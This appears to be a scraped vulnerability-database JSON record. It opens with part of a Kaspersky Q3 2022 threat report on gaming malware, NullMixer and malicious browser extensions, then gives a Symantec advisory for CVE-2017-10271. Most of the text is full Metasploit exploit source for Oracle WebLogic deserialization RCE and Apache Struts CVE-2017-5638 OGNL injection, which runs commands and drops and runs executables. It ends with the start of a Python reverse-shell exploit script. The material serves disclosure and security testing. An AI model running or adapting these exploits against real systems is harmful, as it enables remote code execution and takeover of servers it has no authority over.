In addition, the description contained fake statistics and the project description referenced the web pages of the original "requests" package, as well as the author's email. All mentions of the legitimate package's name were replaced with the name of the malicious one.\n\n### Cyberthreats facing gamers\n\nThe gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) \u2013 a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that's not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.\n\nWe recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021\u201322. Here are some of the key headlines:\n\n * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.\n * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.\n * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.\n * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security. 
In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.\n * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.\n\nAmong the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.\n\nThe Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.\n\nRedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs \u2013 useful for cryptocurrency mining.\n\nIn addition to losing sensitive data, the player's reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim's YouTube channel \u2013 the same video that led the gamer to become infected. In this way, they become the means by which other gamers become infected.\n\n### NullMixer: oodles of Trojans in a single dropper\n\nTrying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise. 
In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host "cracks", "keygens" and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). 
Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt's always good to check the permissions an extension requests during installation. And if it's asking for permission to do things that don't seem appropriate, don't install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it's not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to "read and change all your data on the websites you visit". They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. 
To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed it. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent of the number of people affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2021-06-08T19:08:30", "description": "### Description\n\nOracle WebLogic Server is prone to a remote security vulnerability in WLS Security. The vulnerability can be exploited over the 'HTTP' protocol. This vulnerability affects the following supported versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0\n\n### Technologies Affected\n\n * Oracle Weblogic Server 10.3.6.0 \n * Oracle Weblogic Server 12.1.3.0 \n * Oracle Weblogic Server 12.2.1.1 \n * Oracle Weblogic Server 12.2.1.2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nFilter access to the affected computer at the network boundary if global access isn't needed. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity including unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Modify default ACL settings.** \nImplement database access control to limit the immediate impact of such vulnerabilities on the data and possibly the database itself. Ensure that applications are isolated from one another and from sensitive data through separate user accounts and restrictive ACL configurations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo limit the impact of latent vulnerabilities, configure servers and other applications to run as a nonadministrative user with minimal access rights.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-10-17T00:00:00", "type": "symantec", "title": "Oracle WebLogic Server CVE-2017-10271 Remote Security Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2017-10-17T00:00:00", "id": "SMNTC-101304", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101304", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-01-29T00:20:57", "description": "", "cvss3": {}, "published": "2018-01-28T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-10271"], "modified": "2018-01-28T00:00:00", "id": "PACKETSTORM:146143", "href": "https://packetstormsecurity.com/files/146143/Oracle-WebLogic-wls-wsat-Component-Deserialization-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n# 
include Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic wls-wsat Component Deserialization RCE', \n'Description' => %q( \nThe Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization \nremote code execution vulnerability. Supported versions that are affected are \n10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin \nof ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT, \nHTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check \nand will not be used when executing the exploit itself. \n), \n'License' => MSF_LICENSE, \n'Author' => [ \n'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>', # Metasploit module \n'Luffin', # Proof of Concept \n'Alexey Tyurin', 'Federico Dotta' # Vulnerability Discovery \n], \n'References' => \n[ \n['URL', 'https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html'], # Security Bulletin \n['URL', 'https://github.com/Luffin/CVE-2017-10271'], # Proof-of-Concept \n['URL', 'https://github.com/kkirsche/CVE-2017-10271'], # Standalone Exploit \n['CVE', '2017-10271'], \n['EDB', '43458'] \n], \n'Platform' => %w{ win unix }, \n'Arch' => [ ARCH_CMD ], \n'Targets' => \n[ \n[ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ], \n[ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ] \n], \n'DisclosureDate' => \"Oct 19 2017\", \n# Note that this is by index, rather than name. It's generally easiest \n# just to put the default at the beginning of the list and skip this \n# entirely. 
\n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']), \nOptPort.new('RPORT', [true, \"The remote port that the WebLogic WSAT endpoint listens on\", 7001]), \nOptFloat.new('TIMEOUT', [true, \"The timeout value of requests to RHOST\", 20.0]), \n# OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10]) \n]) \nend \n \ndef cmd_base \nif target['Platform'] == 'win' \nreturn 'cmd' \nelse \nreturn '/bin/sh' \nend \nend \n \ndef cmd_opt \nif target['Platform'] == 'win' \nreturn '/c' \nelse \nreturn '-c' \nend \nend \n \n \n# \n# This generates a XML payload that will execute the desired payload on the RHOST \n# \ndef exploit_process_builder_payload \n# Generate a payload which will execute on a *nix machine using /bin/sh \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java> \n<void class=\"java.lang.ProcessBuilder\"> \n<array class=\"java.lang.String\" length=\"3\" > \n<void index=\"0\"> \n<string>#{cmd_base}</string> \n</void> \n<void index=\"1\"> \n<string>#{cmd_opt}</string> \n</void> \n<void index=\"2\"> \n<string>#{payload.encoded.encode(xml: :text)}</string> \n</void> \n</array> \n<void method=\"start\"/> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# This builds a XML payload that will generate a HTTP GET request to our SRVHOST \n# from the target machine. 
\n# \ndef check_process_builder_payload \nxml = %Q{<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n<soapenv:Header> \n<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n<java version=\"1.8\" class=\"java.beans.XMLDecoder\"> \n<void id=\"url\" class=\"java.net.URL\"> \n<string>#{get_uri.encode(xml: :text)}</string> \n</void> \n<void idref=\"url\"> \n<void id=\"stream\" method = \"openStream\" /> \n</void> \n</java> \n</work:WorkContext> \n</soapenv:Header> \n<soapenv:Body/> \n</soapenv:Envelope>} \nend \n \n# \n# In the event that a 'check' host responds, we should respond randomly so that we don't clog up \n# the logs too much with a no response error or similar. \n# \ndef on_request_uri(cli, request) \nrandom_content = '<html><head></head><body><p>'+Rex::Text.rand_text_alphanumeric(20)+'<p></body></html>' \nsend_response(cli, random_content) \n \n@received_request = true \nend \n \n# \n# The exploit method connects to the remote service and sends a randomly generated string \n# encapsulated within a SOAP XML body. This will start an HTTP server for us to receive \n# the response from. 
This is based off of the exploit technique from \n# exploits/windows/novell/netiq_pum_eval.rb \n# \n# This doesn't work as is because MSF cannot mix HttpServer and HttpClient \n# at the time of authoring this \n# \n# def check \n# start_service \n# \n# print_status('Sending the check payload...') \n# res = send_request_cgi({ \n# 'method' => 'POST', \n# 'uri' => normalize_uri(target_uri.path), \n# 'data' => check_process_builder_payload, \n# 'ctype' => 'text/xml;charset=UTF-8' \n# }, datastore['TIMEOUT']) \n# \n# print_status(\"Waiting #{datastore['HTTP_DELAY']} seconds to see if the target requests our URI...\") \n# \n# waited = 0 \n# until @received_request \n# sleep 1 \n# waited += 1 \n# if waited > datastore['HTTP_DELAY'] \n# stop_service \n# return Exploit::CheckCode::Safe \n# end \n# end \n# \n# stop_service \n# return Exploit::CheckCode::Vulnerable \n# end \n \n# \n# The exploit method connects to the remote service and sends the specified payload \n# encapsulated within a SOAP XML body. 
\n# \ndef exploit \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path), \n'data' => exploit_process_builder_payload, \n'ctype' => 'text/xml;charset=UTF-8' \n}, datastore['TIMEOUT']) \nend \nend \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/146143/oracle_weblogic_wsat_deserialization_rce.rb.txt"}, {"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "packetstorm", "title": "Apache Struts Jakarta Multipart Parser OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141630", "href": "https://packetstormsecurity.com/files/141630/Apache-Struts-Jakarta-Multipart-Parser-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts Jakarta Multipart Parser OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vunlerability in Apache Struts \nversion 2.3.5 - 2.3.31, and 2.5 - 2.5.10. Remote Code Execution can be performed \nvia http Content-Type header. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. 
\n}, \n'Author' => [ \n'Nike.Zheng', # PoC \n'Nixawk', # Metasploit module \n'Chorder', # Metasploit module \n'egypt', # combining the above \n'Jeffrey Martin', # Java fu \n], \n'References' => [ \n['CVE', '2017-5638'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'] \n], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Universal', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n], \n'DisclosureDate' => 'Mar 07 2017', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'The path to a struts application action', '/struts2-showcase/' ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]) \n] \n) \n \n@data_header = \"X-#{rand_text_alpha(4)}\" \nend \n \ndef check \nvar_a = rand_text_alpha_lower(4) \n \nognl = \"\" \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('|+var_a+%q|', #os))| \n \nbegin \nresp = send_struts_request(ognl) \nrescue Msf::Exploit::Failed \nreturn Exploit::CheckCode::Unknown \nend \n \nif resp && resp.code == 200 && resp.headers[var_a] \nvprint_good(\"Victim operating system: #{resp.headers[var_a]}\") \nExploit::CheckCode::Vulnerable \nelse \nExploit::CheckCode::Safe \nend \nend \n \ndef exploit \ncase payload.arch.first \n#when ARCH_JAVA \n# datastore['LHOST'] = nil \n# resp = send_payload(payload.encoded_jar) \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload(generate_payload_exe) \nend \n \nrequire'pp' \npp resp.headers if resp \nend \n \ndef send_struts_request(ognl, extra_header: '') \nuri = normalize_uri(datastore[\"TARGETURI\"]) \ncontent_type = \"%{(#_='multipart/form-data').\" \ncontent_type << \"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).\" \ncontent_type << 
\"(#_memberAccess?\" \ncontent_type << \"(#_memberAccess=#dm):\" \ncontent_type << \"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\" \ncontent_type << \"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\" \ncontent_type << \"(#ognlUtil.getExcludedPackageNames().clear()).\" \ncontent_type << \"(#ognlUtil.getExcludedClasses().clear()).\" \ncontent_type << \"(#context.setMemberAccess(#dm)))).\" \ncontent_type << ognl \ncontent_type << \"}\" \n \nheaders = { 'Content-Type' => content_type } \nif extra_header \nheaders[@data_header] = extra_header \nend \n \n#puts content_type.gsub(\").\", \").\\n\") \n#puts \n \nresp = send_request_cgi( \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI') \nend \nresp \nend \n \ndef execute_command(cmd) \nognl = '' \nognl << %Q|(#cmd=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \n \n# You can add headers to the server's response for debugging with this: \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << %q|(#r.addHeader('decoded',#cmd)).| \n \nognl << %q|(#os=@java.lang.System@getProperty('os.name')).| \nognl << %q|(#cmds=(#os.toLowerCase().contains('win')?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).| \nognl << %q|(#p=new java.lang.ProcessBuilder(#cmds)).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start())| \n \nsend_struts_request(ognl, extra_header: cmd) \nend \n \ndef send_payload(exe) \n \nognl = \"\" \nognl << %Q|(#data=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{@data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{rand_text_alpha(4)}','.exe')).| \n#ognl << %q|(#r=#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']).| \n#ognl << 
%q|(#r.addHeader('file',#f.getAbsolutePath())).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#fos=new java.io.FileOutputStream(#f)).| \n \n# Using stuff from the sun.* package here means it likely won't work on \n# non-Oracle JVMs, but the b64 decoder in Apache Commons doesn't seem to \n# work and I don't see a better way of getting binary data onto the \n# system. =/ \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#data)).| \nognl << %q|(#fos.write(#d)).| \nognl << %q|(#fos.close()).| \n \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete())| \n \nsend_struts_request(ognl, extra_header: [exe].pack(\"m\").delete(\"\\n\")) \nend \n \nend \n \n=begin \nDoesn't work: \n \nognl << %q|(#cl=new java.net.URLClassLoader(new java.net.URL[]{#f.toURI().toURL()})).| \nognl << %q|(#c=#cl.loadClass('metasploit.Payload')).| \nognl << %q|(#m=@ognl.OgnlRuntime@getMethods(#c,'main',true).get(0)).| \nognl << %q|(#r.addHeader('meth',#m.toGenericString())).| \nognl << %q|(#m.invoke(null,null)).| \n \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new 
java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4fee2899 \n#ognl << %q|(#m=#c.getMethod('run',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('run',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@50af0cd6 \n \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.Object'))).| # java.lang.IllegalArgumentException: 
java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('java.lang.String'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.Object;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@58ce5ef0 \n#ognl << %q|(#m=#c.getMethod('main',@java.lang.Class@forName('[Ljava.lang.String;'))).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@2231d3a9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('java.lang.String')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@684b3dfd \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Class[]{null})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.Object')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('java.lang.String')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.Object;')})).| \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{@java.lang.Class@forName('[Ljava.lang.String;')})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@16e2d926 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@5f78809f \n#ognl << %q|(#m=#c.getMethod('main',new 
java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@4b232ba9 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[]{null})).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@56c6add5 \n#ognl << %q|(#m=#c.getMethod('main',new java.lang.Object[])).| # parse failed \n#ognl << %q|(#m=#c.getMethod('main',null)).| # java.lang.IllegalArgumentException: java.lang.ClassCastException@1722884 \n \n=end \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/141630/struts2_content_type_ognl.rb.txt"}, {"lastseen": "2017-03-12T01:15:38", "description": "", "cvss3": {}, "published": "2017-03-10T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 2.3.x / 2.5.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T00:00:00", "id": "PACKETSTORM:141576", "href": "https://packetstormsecurity.com/files/141576/Apache-Struts-2-2.3.x-2.5.x-Remote-Code-Execution.html", "sourceData": "`# CVE-2017-5638 \n# Apache Struts 2 Vulnerability Remote Code Execution \n# Reverse shell from target \n# Author: anarc0der - github.com/anarcoder \n# Tested with tomcat8 \n \n# Install tomcat8 \n# Deploy WAR file https://github.com/nixawk/labs/tree/master/CVE-2017-5638 \n \n# Ex: \n# Open: $ nc -lnvp 4444 \n# python2 struntsrce.py --target=http://localhost:8080/struts2_2.3.15.1-showcase/showcase.action --ip=127.0.0.1 --port=4444 \n \n\"\"\" \nUsage: \nstruntsrce.py --target=<arg> --ip=<arg> --port=<arg> \nstruntsrce.py --help \nstruntsrce.py --version \n \nOptions: \n-h --help Open help menu \n-v --version Show version \nRequired options: \n--target='url target' your target :) \n--ip='10.10.10.1' your ip \n--port=4444 open port for back connection \n \n\"\"\" \n \nimport urllib2 \nimport httplib \nimport os \nimport sys \nfrom docopt import docopt, DocoptExit \n \n \nclass CVE_2017_5638(): \n \ndef __init__(self, 
